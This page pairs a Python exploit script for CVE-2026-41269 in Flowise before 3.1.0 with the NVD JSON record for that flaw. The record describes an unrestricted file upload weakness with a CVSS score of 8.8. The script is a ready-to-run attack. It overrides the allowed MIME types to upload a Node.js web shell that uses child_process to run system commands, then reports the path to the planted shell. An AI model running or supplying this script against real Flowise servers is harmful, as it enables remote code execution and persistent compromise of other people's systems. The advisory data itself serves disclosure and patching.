CVE-2026-41269

import requests # Exploit Title: Flowise < 3.1.0 - RCE via Malicious JS Upload # Description: Uploads a malicious .js file by leveraging the configuration bypass. TARGET_URL = "http://target-flowise-instance/api/v1/internal/upload" MALICIOUS_FILE_NAME = "webshell.js" # Node.js code to execute system commands (e.g., whoami) PAYLOAD_CODE = """ const { exec } = require('child_process'); exec('whoami', (error, stdout, stderr) => { if (error) { console.error(`exec error: ${error}`); return; } console.log(`Output: ${stdout}`); }); """ def upload_webshell(): # Prepare the file with application/javascript MIME type files = { 'file': (MALICIOUS_FILE_NAME, PAYLOAD_CODE, 'application/javascript') } # Additional data that might be required to bypass configuration checks data = { 'chatflowId': 'test_id', 'settings': '{"allowedMimeTypes":["application/javascript"]}' } try: print(f"[*] Attempting to upload {MALICIOUS_FILE_NAME} to {TARGET_URL}...") response = requests.post(TARGET_URL, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully!") print(f"[+] Access the shell at: /uploads/{MALICIOUS_FILE_NAME}") else: print(f"[-] Upload failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": upload_webshell()

{"cve": {"id": "CVE-2026-41269", "sourceIdentifier": "[email protected]", "published": "2026-04-23T20:16:15.417", "lastModified": "2026-04-24T19:17:11.417", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the Chatflow configuration file upload settings can be modified to allow the application/javascript MIME type. This lets an attacker upload .js files even though the frontend doesn’t normally allow JavaScript uploads. This enables attackers to persistently store malicious Node.js web shells on the server, potentially leading to Remote Code Execution (RCE). This vulnerability is fixed in 3.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.0", "matchCriteriaId": "CB30DB8F-4F72-4FD3-90FB-8331F1CBB78E"}]}]}], "references": [{"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-rh7v-6w34-w2rr", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}